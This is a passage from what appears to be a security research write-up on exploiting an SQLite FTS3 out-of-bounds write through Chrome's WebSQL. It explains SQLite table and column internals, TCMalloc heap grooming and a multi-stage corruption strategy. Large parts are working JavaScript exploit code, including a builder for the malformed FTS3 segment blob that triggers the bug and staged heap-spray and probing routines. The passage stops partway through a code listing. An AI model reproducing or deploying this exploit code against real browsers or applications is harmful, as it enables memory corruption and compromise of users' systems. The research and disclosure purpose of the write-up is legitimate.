    A = TF_WithoutRowid | TF_NoVisibleRowid;
  }else{
    A = 0;
    sqlite3ErrorMsg(pParse, "unknown table option: %.*s", X.n, X.z);
  }
}
columnlist ::= columnlist COMMA columnname carglist.
columnlist ::= columnname carglist.
columnname(A) ::= nm(A) typetoken(Y). {sqlite3AddColumn(pParse,&A,&Y);}

The bulk of the Table creation logic is performed in the sqlite3StartTable function, and the Column handling logic is found in sqlite3AddColumn. Let’s visit the sqlite3StartTable function and take a brief look.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
void sqlite3StartTable(
  Parse *pParse,   /* Parser context */
  Token *pName1,   /* First part of the name of the table or view */
  Token *pName2,   /* Second part of the name of the table or view */
  int isTemp,      /* True if this is a TEMP table */
  int isView,      /* True if this is a VIEW */
  int isVirtual,   /* True if this is a VIRTUAL table */
  int noErr        /* Do nothing if table already exists */
){
  Table *pTable;
  char *zName = 0; /* The name of the new table */
  sqlite3 *db = pParse->db;
  Vdbe *v;
  int iDb;         /* Database number to create the table in */
  Token *pName;    /* Unqualified name of the table to create */

  // snipped for brevity

  pTable = sqlite3DbMallocZero(db, sizeof(Table));
  if( pTable==0 ){
    assert( db->mallocFailed );
    pParse->rc = SQLITE_NOMEM_BKPT;
    pParse->nErr++;
    goto begin_table_error;
  }
  pTable->zName = zName;
  pTable->iPKey = -1;
  pTable->pSchema = db->aDb[iDb].pSchema;
  pTable->nTabRef = 1;

  // snipped for brevity

The most important object for our purposes is the Table object. This structure contains every information of the table created by the CREATE statement, and the definition is as follows.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct Table {
  char *zName;         /* Name of the table or view */
  Column *aCol;        /* Information about each column */
  Index *pIndex;       /* List of SQL indexes on this table. */
  Select *pSelect;     /* NULL for tables.  Points to definition if a view. */
  FKey *pFKey;         /* Linked list of all foreign keys in this table */
  char *zColAff;       /* String defining the affinity of each column */
  ExprList *pCheck;    /* All CHECK constraints */
                       /*   ... also used as column name list in a VIEW */
  int tnum;            /* Root BTree page for this table */
  u32 nTabRef;         /* Number of pointers to this Table */
  u32 tabFlags;        /* Mask of TF_* values */
  i16 iPKey;           /* If not negative, use aCol[iPKey] as the rowid */
  i16 nCol;            /* Number of columns in this table */
  LogEst nRowLogEst;   /* Estimated rows in table - from sqlite_stat1 table */
  LogEst szTabRow;     /* Estimated size of each table row in bytes */
  u8 keyConf;          /* What to do in case of uniqueness conflict on iPKey */
  int addColOffset;    /* Offset in CREATE TABLE stmt to add a new column */
  int nModuleArg;      /* Number of arguments to the module */
  char **azModuleArg;  /* 0: module 1: schema 2: vtab name 3...: args */
  VTable *pVTable;     /* List of VTable objects. */
  Trigger *pTrigger;   /* List of triggers stored in pSchema */
  Schema *pSchema;     /* Schema that contains this table */
  Table *pNextZombie;  /* Next on the Parse.pZombieTab list */
};

For our purposes, the most important fields is aCol and nCol. Next, we will look at the sqlite3AddColumn function.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
void sqlite3AddColumn(Parse *pParse, Token *pName, Token *pType){
  Table *p;
  int i;
  char *z;
  char *zType;
  Column *pCol;
  sqlite3 *db = pParse->db;
  if( (p = pParse->pNewTable)==0 ) return;
  if( p->nCol+1>db->aLimit[SQLITE_LIMIT_COLUMN] ){
    sqlite3ErrorMsg(pParse, "too many columns on %s", p->zName);
    return;
  }
  z = sqlite3DbMallocRaw(db, pName->n + pType->n + 2);
  if( z==0 ) return;
  if( IN_RENAME_OBJECT ) sqlite3RenameTokenMap(pParse, (void*)z, pName);
  memcpy(z, pName->z, pName->n);
  z[pName->n] = 0;
  sqlite3Dequote(z);
  for(i=0; i<p->nCol; i++){
    if( sqlite3_stricmp(z, p->aCol[i].zName)==0 ){
      sqlite3ErrorMsg(pParse, "duplicate column name: %s", z);
      sqlite3DbFree(db, z);
      return;
    }
  }
  if( (p->nCol & 0x7)==0 ){
    Column *aNew;
    aNew = sqlite3DbRealloc(db,p->aCol,(p->nCol+8)*sizeof(p->aCol[0]));
    if( aNew==0 ){
      sqlite3DbFree(db, z);
      return;
    }
    p->aCol = aNew;
  }
  pCol = &p->aCol[p->nCol];
  memset(pCol, 0, sizeof(p->aCol[0]));
  pCol->zName = z;
  sqlite3ColumnPropertiesFromName(p, pCol);
 
  if( pType->n==0 ){
    /* If there is no type specified, columns have the default affinity
    ** 'BLOB' with a default size of 4 bytes. */
    pCol->affinity = SQLITE_AFF_BLOB;
    pCol->szEst = 1;
#ifdef SQLITE_ENABLE_SORTER_REFERENCES
    if( 4>=sqlite3GlobalConfig.szSorterRef ){
      pCol->colFlags |= COLFLAG_SORTERREF;
    }
#endif
  }else{
    zType = z + sqlite3Strlen30(z) + 1;
    memcpy(zType, pType->z, pType->n);
    zType[pType->n] = 0;
    sqlite3Dequote(zType);
    pCol->affinity = sqlite3AffinityType(zType, pCol);
    pCol->colFlags |= COLFLAG_HASTYPE;
  }
  p->nCol++;
  pParse->constraintName.n = 0;
}

The important parts of the logic are highlighted. Several things can be observed from this function. First, as mentioned above, there is no limit on the length of the column name. However, there is a limit of how many columns can exist on a single table, and that value is defined by db->aLimit[SQLITE_LIMIT_COLUMN]. The value comes from a #define value in the SQLite source code, and is set to 2000.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 ** This is the maximum number of
 **
 **    * Columns in a table
 **    * Columns in an index
 **    * Columns in a view
 **    * Terms in the SET clause of an UPDATE statement
 **    * Terms in the result set of a SELECT statement
 **    * Terms in the GROUP BY or ORDER BY clauses of a SELECT statement.
 **    * Terms in the VALUES clause of an INSERT statement
 **
 ** The hard upper limit here is 32676.  Most database people will
 ** tell you that in a well-normalized database, you usually should
 ** not have more than a dozen or so columns in any table.  And if
 ** that is the case, there is no point in having more than a few
 ** dozen values in any of the other situations described above.
 */

 #ifndef SQLITE_MAX_COLUMN
 # define SQLITE_MAX_COLUMN 2000
 #endif

This is something to keep in mind for later.
Also, column names can not be duplicate. Next, the column properties are stored in an array of Column objects, which tableObject->aCol points to. This array grows by every 8 new columns, which can be seen in line 26. This function also sets various flags of the Column object. The definition of the Column structure is as follows.

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
** information about each column of an SQL table is held in an instance
** of this structure.
*/

struct Column {
  char *zName;     /* Name of this column, \000, then the type */
  Expr *pDflt;     /* Default value of this column */
  char *zColl;     /* Collating sequence.  If NULL, use the default */
  u8 notNull;      /* An OE_ code for handling a NOT NULL constraint */
  char affinity;   /* One of the SQLITE_AFF_... values */
  u8 szEst;        /* Estimated size of value in this column. sizeof(INT)==1 */
  u8 colFlags;     /* Boolean properties.  See COLFLAG_ defines below */
};

The actual column name will be held in zName, and there are various other fields that describe the characteristics of a column.

One last thing that should be mentioned is that these functions are called in the parser phase of the SQLite execution pipeline. This means that the only heap noise present is the noise from the tokenizer phase. However, the tokenizer creates almost zero heap noise and therefore, the objects created on the heap as well as the heap activity that occurs during a CREATE TABLE statements is quite manageable.

The following is how an actual Table object and the accompanying Column array would look in memory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
sqlite> CREATE TABLE test(t1, t2, t3);

(gdb) p *(Table*)0x74ab38
$13 = {
  zName = 0x728cf8 "test",
  aCol = 0x74ac28,
  pIndex = 0x0,
  pSelect = 0x0,
  pFKey = 0x0,
  zColAff = 0x0,
  pCheck = 0x0,
  tnum = 2,
  nTabRef = 1,
  tabFlags = 0,
  iPKey = -1,
  nCol = 3,
  nRowLogEst = 200,
  szTabRow = 40,
  keyConf = 0 '\000',
  addColOffset = 28,
  nModuleArg = 0,
  azModuleArg = 0x0,
  pVTable = 0x0,
  pTrigger = 0x0,
  pSchema = 0x72aa38,
  pNextZombie = 0x0
}

(gdb) p *(Column*)0x74ac28@3
$15 = {{
    zName = 0x74b678 "t1",
    pDflt = 0x0,
    zColl = 0x0,
    notNull = 0 '\000',
    affinity = 65 'A',
    szEst = 1 '\001',
    colFlags = 0 '\000'
  }, {
    zName = 0x74b6c8 "t2",
    pDflt = 0x0,
    zColl = 0x0,
    notNull = 0 '\000',
    affinity = 65 'A',
    szEst = 1 '\001',
    colFlags = 0 '\000'
  }, {
    zName = 0x74abc8 "t3",
    pDflt = 0x0,
    zColl = 0x0,
    notNull = 0 '\000',
    affinity = 65 'A',
    szEst = 1 '\001',
    colFlags = 0 '\000'
  }}

The important thing to notice about these table objects is that they are used for every operation on the table, be it a SELECT, UPDATE, or INSERT statement. Every field in a user query that references things in a certain table, will be checked against this table object that resides in memory. What this means in an exploitation view is that, if it is possible to corrupt certain fields in these objects, we can make SQLite react in peculiar ways when certain SQL queries are issued. Take the column name above as an example. If we could corrupt the name t1 and change it to t1337, and afterwards if the attacker executes the SQL statement “SELECT t1 from test”, the SQLite engine will respond as “No such column as t1 exists”. This is because when the select statement is executed, the SQLite engine will consult the above table and look at the aCol field, and sequentially test if there exists a column which matches the name t1. If it doesn’t find such column, then it returns an error.

Knowing this, and the other elements discussed above, a plan of attack emerges.

  1. Spray a whole bunch of Column arrays, as many to fill more than 2GB’s of memory.
  2. Place the vulnerable apple fts3 allocation in front of the spray.
  3. Trigger the vulnerability, and corrupt one of the column object’s zName field.
  4. Corrupt the field so that it points to an address that we want to leak.
  5. Afterwards, try to leak the value through SQL statements.

There are several caveats with this approach. The problems are not immediately clear until actually constructing the payload and viewing the results, so we will address them as they appear, one by one.

The first problem is that, the maximum number of columns in SQLite is 2000. A single column object’s size is 0x20. This means that the maximum size of a Column array is 0xFA00. In order to spray 2GB worth of memory, 0x8000 Tables with 2000 columns have to be sprayed. 0x8000 doesn’t seem like a big number for SQLite to handle, but when actually spraying that amount of column arrays, the time elapsed from beginning to completion is 10 minutes. This is a lot of time. It was desired to reduce that time to something more manageable.

To address this problem, we used a divide-and-conquer approach. How it works is as follows.

  1. Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
  2. Place the vulnerable apple fts3 allocation in front of the spray.
  3. Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
  4. Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.

A picture is worth a thousand words. The entire process is illustrated below.

When testing this the first time on Chrome, we realized that it actually works. So we decided to build all kinds of different primitives based on this concept.

Another problem became immediately clear when executing this first experiment several times. That is, the random location of apple. After the first successful corruption, upon the next corruption, the allocation of apple would jump to a completely different place from the previous allocation. This was strongly undesirable. In order to place an object of interest in the OOB write address, that OOB write location needed to stay in a fixed position, instead of jumping all around the place which makes it impossible to build other primitives on. The reason apple kept on moving was because it was allocated based on the 0x10 size-class’s freelist of the thread cache. It is highly likely that heap noise that places a lot of 0x10 chunks on the freelist was the source of uncertainty. In order to understand the actual source of the noise, let’s look at the stack trace of when the bug triggers.

1
2
3
4
5
6
7
8
9
10
11
12
Breakpoint 2, fts3SegReaderNext (p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731
168731    if( !pReader->aDoclist ){
(gdb) bt
#0  fts3SegReaderNext (p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731
#1  0x00000000004e414a in fts3SegReaderStart (p=0x74b378, pCsr=0x74dbf8, zTerm=0x751128 "sample", nTerm=6) at sqlite3.c:170143
#2  0x00000000004e427a in sqlite3Fts3MsrIncrStart (p=0x74b378, pCsr=0x74dbf8, iCol=1, zTerm=0x751128 "sample", nTerm=6) at sqlite3.c:170183
#3  0x00000000004d7699 in fts3EvalPhraseStart (pCsr=0x753fe8, bOptOk=1, p=0x7510a8) at sqlite3.c:161648
#4  0x00000000004d8356 in fts3EvalStartReaders (pCsr=0x753fe8, pExpr=0x751068, pRc=0x7fffffffbe68) at sqlite3.c:162034
#5  0x00000000004d8c62 in fts3EvalStart (pCsr=0x753fe8) at sqlite3.c:162362
#6  0x00000000004d5ed1 in fts3FilterMethod (pCursor=0x753fe8, idxNum=3, idxStr=0x0, nVal=1, apVal=0x745540) at sqlite3.c:160604
#7  0x0000000000465aca in sqlite3VdbeExec (p=0x73f428) at sqlite3.c:89599
#8  0x000000000045a1cb in sqlite3Step (p=0x73f428) at sqlite3.c:81040

In line 11, it can be observed that the Virtual Table Method fts3FilterMethod is executed from the Virtual Data Base Engine. What this means is that the SELECT statements were tokenized, parsed, bytecode generated, and bytecode executed. It is easy to imagine how much unwanted heap allocations would occur throughout that entire phase of execution.

Generally, there are 2 ways to deal with heap noise.

  1. Precisely track every single heap allocation that occurs when the bug triggers, and make the exploit compatible with all the heap noise.
  2. Upgrade the heap objects that are used during exploitation to a size-class that is not busy, where almost no heap noise occurs in that size-class.

Method 1 is definitely possible, and have been successful in some of the past engagements. However, whenever method 2 is applicable, it is the desirable method and the one that is always chosen to overcome the situation. To address the heap noise, we went with method 2, because the size of the apple allocation is completely attacker controlled.

Now it is time to refine the strategy.

  1. The size of apple should be upgraded to something bigger than 0x800. Let’s say, 0xa00.
  2. 0xa00 sized chunks will be sprayed. One of the 0xa00 chunks will be a placeholder to be used with the apple fts3 allocation.
  3. Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
  4. Create a hole in the placeholder in step2. This will place it on the top of the 0xa00 freelist.
  5. Allocate the 0xa00 sized apple fts3 allocation in the placeholder. Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
  6. Plug in the placeholder hole with a new 0xa00 allocation, so it could be reused for corruption in a later phase.
  7. Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.

The entire process is illustrated below.

This strategy makes it possible to corrupt the same address over and over again with different content on each corruption attempt. It is imperative for the OOB write to work repeatedly and reliably no matter how many times it was executed, in order to to move forwards to the next stages of exploitation. While experimenting with this strategy, it came to realization that the OOB write would not be reliable when the bug trigger SQL statements were coupled with other SQL statements, such as the heap spray statements. However, when the bug trigger SQL statements were detached into a single transaction and was executed separately from any other statements, it work reliably. Even when the primitive was executed 0x1000 times, not a single attempt had apple stray away from the placeholder, and all attempts succeeded with the OOB writing at the same address in all attempts.

One thing to note is how the heap manipulating primitives are constructed. To spray the heap with a controlled size and controlled content chunk, a table is created with a single column, and the column name will be the sprayed content. To create holes, the table will be dropped, and the attached column name will be deallocated from the heap. This creates a perfect primitive to create chunks and free them, in a completely controlled manner.

Another thing worth mentioning is the discrepancy of where the chunks are operating. For instance, the hole creating primitive would free the column name on the parser phase. The stage where the fts table’s term apple is allocated, is during the execution of the Bytecode Engine. There will be a lot of noise in-between where the chunk is freed, and when apple refills it. However, in order to minimize the noise, we’ve upgraded the apple chunk to a 0xa00 size class. Also, as luck has it, the hole created during DROP TABLE remains on the top of the freelist, all the way until apple comes along to pick it back up. This is not always the case as will be seen in the later stages of exploitation, but the DROP TABLE and apple allocation make a perfect pair for the free/refill.

The entire strategy described above would look something like this in javascript.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
function create_oob_string(chunk_size, memcpy_offset, payload){
    let target_chunk;
    let chunk_size_adjusted;

    if(chunk_size < 0x1000)
        chunk_size_adjusted = chunk_size - 0x10;
    else
        chunk_size_adjusted = chunk_size - 0x100;
    chunk_size_adjusted /= 2;   // To account for the *2 on realloc

    target_chunk = 'A'.hexEncode().repeat(chunk_size_adjusted);
    let payload_hex = payload.hexEncode();
    let oob_string = `X'00${create_var_int(chunk_size_adjusted)}${target_chunk}03010200${create_var_int(memcpy_offset)}${create_var_int(payload.length)}${payload_hex}03010200'`;

    return oob_string;
}

function create_var_int(number){
    let varint = '';
    let length = 0;
    let current_number = number;

    while(current_number != 0){
        let mask = 0x80;
        let shifted_number = current_number >> 7;

        if(shifted_number == 0){
            mask = 0;
        }
        let current_byte = (current_number & 0x7F) | mask;
        if((current_byte & 0xF0) == 0){
            varint += '0' + current_byte.toString(16);
        }
        else{
            varint += current_byte.toString(16);
        }
        current_number = shifted_number;
        length++;
    }

    return varint;
}

function sploit1() {
    console.log('Stage1 start!');

    var statements = [];

    statements.push("CREATE TABLE debug_table(AAA)");
    statements.push("CREATE VIRTUAL TABLE ft USING fts3");
    statements.push("INSERT INTO ft VALUES('dummy')");

    //statements.push("DROP TABLE debug_table");
    for(var i=0; i<big_boy_spray_count; i++){
        spray(statements, big_boy_spray_size, 1, "A");
    }

    for(var i=0; i<0x100; i++){
        spray(statements, oob_chunk_size, 1, "A");
    }
    saved_index = global_table_index - 0x15;
    reference_saved_index = saved_index;

    runAll(statements, (event) => {
        console.log('Stage1 done');
        sploit2();
    });
}

function sploit2() {
    let statements = [];
    let found_flag = 0;
    let oob_string = create_oob_string(oob_chunk_size, 0x7FFFFFFF, "ZZZZ");

    console.log('Stage2 Start!');

    statements.push(`UPDATE ft_segdir SET root = ${oob_string}`);
    statements.push(`DROP TABLE test${saved_index}`);
    statements.push(`SELECT * FROM ft WHERE ft MATCH 'test'`);
    saved_index = spray(statements, oob_chunk_size, 1, "A");

    function ping_column(current_index){
        let statement = `SELECT ${"A".repeat(0x10000000 - 0x100)}_0 FROM test${current_index}`;
        db.transaction((tx) => {
                tx.executeSql(
                    statement, [],
                    function(sqlTransaction, sqlResultSet) {
                        console.log('success!!!');
                        console.log(`test index : ${current_index}`)
                        if(current_index == big_boy_spray_count-1){
                            found_flag = -1;
                        }
                    },
                    function(sqlTransaction, sqlError) {
                        console.log('fail!!!');
                        console.log(`test index : ${current_index}`)
                        found_flag = 1;
                    }
                );
            },
            dbErr,
            function(){
                if(found_flag == 0){
                    ping_column(current_index + 1);
                }
                else if(found_flag == 1){
                    let corrupted_index = current_index;
                    console.log(`corrupted index : ${corrupted_index}`);
                    sploit3_1(corrupted_index);
                }
                else{
                    console.log(`Stage1 : The column name didn't get corrupted. Something's wrong...?`);
                }
            }
        );
    }

    runAll(statements, (event) => {
            ping_column(0);
            });
}

Stage 3 ~ Stage 6

In the previous stage, it was mentioned that a divide-and-conquer approach was used. The first stage would spray gigantic 256MB heap chunks, which is 0x10000000 in size. The next stage would scale it down with a factor of 0x10, and do the same thing that the previous stage did with 16MB, or 0x1000000 sized chunks. The following illustration describes the entire process.

It’s easy to see where this is going. On stage 4, the same thing is going to happen, but instead this time 0x100000 sized chunks will be sprayed. On stage 5 0x10000. Stage 6 is 0x1000. All of this is to scale down the target chunks until it reaches the size 0x1000. The reason behind this is because column object arrays can only grow up to 0xFA00 in size, as mentioned above. Also, for every 8 new columns, the column array would be realloc’d making the column array jump all around the place, so in order to make the problem more simpler, 0x1000 was chosen instead of 0x10000. 0x1000 is a big enough size to be void of most of the heap noise.

Before proceeding to the next stage, it is worth discussing sources of failures on this part of the stage. First, all chunks bigger than 0x8000 come from the Central Cache. What this means is that, there is an opportunity that other threads can snatch the pages from the Central Cache, before the WebSQL Database thread has a chance to grab them. Fortunately, this doesn’t happen very often. If it does become a problem though, there is a way to get rid of it. The first thing is to track down the problematic allocation, and figure out what size class it is. Next, we would deliberately allocate and free a chunk that matches the size of the problematic chunk, in a way that it doesn’t get coalesced by adjacent chunks. This will place that free’d chunk on the Central class’s freelist, and when the time comes and the rogue allocation takes place, the problematic thread that requested the problematic allocation will snatch that chunk from the freelist, leaving the other chunks alone. This problem actually applies to all stages. However, this kind of problem occurs very rarely.

The more frequently occurring problem is that of allocations of unintended objects. For instance, all of our heap feng-shui resolves around column names. However, in order to create column names, we have to create a table. When tables are created, lots of objects are allocated on the heap such as the table object, expression trees, column affinity arrays, the table name string, and the like. These will be allocated for every table that is created, so the more tables that are created, the more likely it is that those object’s will exhaust their respective size class’s freelist, and request new chunks from the central cache. When the central cache’s freelist is also exhausted, it will start to steal pages that are reserved for large chunks. Those pages will include the holes that we wanted to refill, such as Table6‘s hole in the above illustration. This is a very possible situation, and when the exploit fails in the first couple of stages, most of the time this is the reason behind the failure. To fix this, it is required to create a really long freelist for all the unintended objects that are allocated upon table creation, and make those unintended objects take chunks from that long freelist. This is kind of complicated in terms of TCMalloc, because there is a maximum size on the thread cache’s freelist and if the program reaches that limit, then the Central Cache will keep stealing some of the chunks from the thread cache’s freelist. This maximum limit will be dynamically increased as TCMalloc sees a lot of heap activity on that chunk size-class’s freelist, but in order to take full advantage of it, it is required to have a deep understanding of the dynamic nature of freelists, and study on how it can be controlled.

A more better way to fix this issue would have been to create one gigantic table with 2000 columns, where all columns would act as a spray. In order to create holes, an SQL statement would be issued to change column names into a different name, which would free the previous column name. SQLite actually provides a way to do this, but unfortunately the version of SQLite that Google used at the time the vulnerability existed is 3.24.0, and hence, that functionality was not implemented yet in Chrome’s SQLite.

The actual best way to deal with this is to pre-create all tables that will be used in the entire exploit, and whenever the need arises to spray column names, it is possible to do so with the ALTER TABLE ADD COLUMN statement. The exploit does not specifically address this issue, and should be re-run if it fails during this stage.

After all the spraying and corrupting, this entire process until stage 6 takes a little over 1 minute in a virtual machine. This is a lot more manageable than 10 minutes. However, 1 minute is still too long to be used in the real world. As the purpose was to create a Proof-of-Concept, the exploit was not improved to further to shave off some more time, due to time constraints. Nevertheless, we will discuss on ideas of how to eliminate most of the spraying time in the end of the blog post.

Now that everything has been covered, we can proceed to Stage 7.

Stage 7

Stage 7’s has only one purpose. Place a 0x1000 sized Column Object Array into the corrupted 0x1000 chunk, and find out which of the column objects inside the array is the one that gets corrupted. This is illustrated below.

After this, it is possible to know which of the 104 columns were corrupted. We can keep that corrupted column index bookmarked, and use it to probe the result of all future corruption attempts.

There is a catch here though. What if the corruption happens after the 104 columns, in one of the columns in the range 104 ~ 128? Since no Column object exists in that range, it would be impossible to know which part of the column object array is corrupted. To fix this, when the exploit determines that the OOB write falls into that specific range, it uses a different apple for the OOB write. Specifically, it uses the apple that’s right in front of the current apple.

By using the apple slot that is 0xa00 before the current apple, The corruption falls back into the 0 ~ 104 range, and Stage 7 can be run again to retrieve the corrupted column. This might fail sometimes, and the previous apple block is actually at a completely random position. When this fails, the exploit should go back to the previous stages and find out which of the other huge blocks of column got corrupted, and then work forwards from there. This is not particularly implemented in the exploit and the exploit should be run again if it fails during this stage.

Before going to the next stage, Stage 7 uses the OOB write to completely wipe out the Column Name address field to 0. The reason is because when the table is dropped, SQLite will go through all the column objects in the array, and issue tc_free(column_name_address) to all of the objects. If the address fed to tc_free is not an address that was returned from a previous tc_malloc, then the program will crash. Wiping it to 0 will make it call tc_free(0), which is essentially a no-op.

Now that we know which column index was corrupted, we can now proceed to Stage 8.

Stage 8

This is the most fragile part of the exploit.

The first thing that Stage 8 tries to achieve, is to drop 3 of the 0x1000 chunks starting from the corrupted one, and fill them back in with controlled chunks. It relies on the fact that when the 0x1000 chunks were sprayed at Stage 6, they were all allocated consecutively, back-to-back from each other. In reality, this is not always the case. Sometimes the 0x1000 will be allocated sequentially, and then at some point the next allocation suddenly jumps to a random location. This happens a lot frequently on small chunks, and it happens rarely in large chunks. The exploit could have been adapted to work on large chunks, but in the current exploitation strategy, the 3 chunks had to include the 104 column object array and place it in the first chunk. The reason behind this is because there must exist a way to place attacker controlled arbitrary data on the heap. In the course of exploiting the bug, such primitive was not used. This is because column names, or in fact, all names that are included in an SQL query is first converted into UTF-8 format before it is stored in memory or the database. To go around that, we use the OOB write itself to write arbitrary payload on memory. This requires everything to be behind the 104 column array, so the address of the arbitrary data can actually be retrieved and used throughout the exploit. All of this will become clear in Stage 9. We will also discuss how to remove this requirement in Stage 10. We were not particularly happy with the instability in this stage, but we just moved forward because the purpose was to prove exploitability. For now, we’ll just assume that the 3 chunks will succeed in being allocated next to each other.

Now we should discuss what kind of 3 chunks are going to be placed.

  1. The first chunk will hold a table of 104 columns. But this time, the corrupted column will point to a column name that is 0x1000 in size. This column name will be filled with B’s.
  2. The second chunk will be that column name, filled with B’s.
  3. The third chunk will be an Fts3Table object.

This sounds easy on text, but the layout of the first two chunks are more complicated than it sounds. Since those two chunks are created in a single CREATE TABLE query, the freelist has to be constructed carefully, so that the two allocations will be placed in that exact order. To make things even more complicated, the freelist will be scrambled depending on which column index was corrupted. Therefore, the freelist must be massaged in different ways, for different column indexes. The way this was solved was to deliberately create holes, deliberately plugging existing holes in different positions in the freelist, changing the order of allocation/free, and adding garbage columns just to compensate for unwanted holes in the freelist. This had to be tested for every index in the column array, and was a tedious process. The end result kind of looks like this.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
function spray_custom_column3(statements, size, times, repeat_char, column_index, column_size){
    let size_adjusted;
    let column_name;

    if(size < 0x1000)
        size_adjusted = size - 0x10;
    else
        size_adjusted = size - 0x100;

    if(column_index == 0)
        column_name = `${repeat_char.repeat(column_size - 0x100)}_0`;
    else
        column_name = `${repeat_char.repeat(size_adjusted)}_0`;
    for(var i=1; i<times; i++){
        if(column_index >= 0 && column_index < 40){
            //if((column_index+0 == i) || (column_index+1 == i) || (column_index+2 == i))
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else if(column_index >= 40 && column_index < 80){
            if((column_index+0 == i) || (column_index+1 == i) || (column_index-1 == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else if(column_index == 80){
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else if(column_index >= 88 && column_index < 104){
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else{
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
    }
    statements.push(`CREATE TABLE test${global_table_index}(${column_name})`);
    global_table_index++;

    return global_table_index-1;
}

function sploit8_1() {
    let statements = [];

    console.log('Stage8-1 Start!');

    if(corrupted_column != 80){
        statements.push(`DROP TABLE test${target_table_index}`);
        statements.push(`DROP TABLE test${reference_table_index+1}`);
    }
    else{
        let temp_index = global_table_index;
        ft3_spray(statements, 0xD80, "AAAA");
        statements.push(`DROP TABLE test${reference_table_index+1}`);
        statements.push(`DROP TABLE test${temp_index}`);
        statements.push(`DROP TABLE test${target_table_index}`);
    }

    target_table_index = global_table_index;
    spray_custom_column3(statements, 0x14, 104, "B", corrupted_column, 0x1000);
    statements.push(`DROP TABLE test${reference_table_index+2}`);
    code_execution_table_index = global_table_index;
    ft3_spray(statements, 0xD80, "AAAA");

    // Just for good measure. In case there are any holes left behind
    ft3_spray(statements, 0xD80, "AAAA");
    ft3_spray(statements, 0xD80, "AAAA");
    ft3_spray(statements, 0xD80, "AAAA");
    ft3_spray(statements, 0xD80, "AAAA");

    runAll(statements, (event) => {
        sploit8_2();
    });
}

There could be a better way to do this, but this was how it was done. The alternative exploitation strategy discussed in Stage 10 will remove the need for this laborious task, so future versions of the exploit should use that strategy instead. Now chunk 1 and chunk 2 is covered. Chunk 3 introduces a new object called Fts3Table. This is an object that is created during the execution of a CREATE VIRTUAL TABLE fts3() query. Let’s take a glimpse of the function that is responsible of creating that object.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
static const sqlite3_module fts3Module = {
  /* iVersion      */ 2,
  /* xCreate       */ fts3CreateMethod,
  /* xConnect      */ fts3ConnectMethod,
  /* xBestIndex    */ fts3BestIndexMethod,
  /* xDisconnect   */ fts3DisconnectMethod,
  /* xDestroy      */ fts3DestroyMethod,
  /* xOpen         */ fts3OpenMethod,
  /* xClose        */ fts3CloseMethod,
  /* xFilter       */ fts3FilterMethod,
  /* xNext         */ fts3NextMethod,
  /* xEof          */ fts3EofMethod,
  /* xColumn       */ fts3ColumnMethod,
  /* xRowid        */ fts3RowidMethod,
  /* xUpdate       */ fts3UpdateMethod,
  /* xBegin        */ fts3BeginMethod,
  /* xSync         */ fts3SyncMethod,
  /* xCommit       */ fts3CommitMethod,
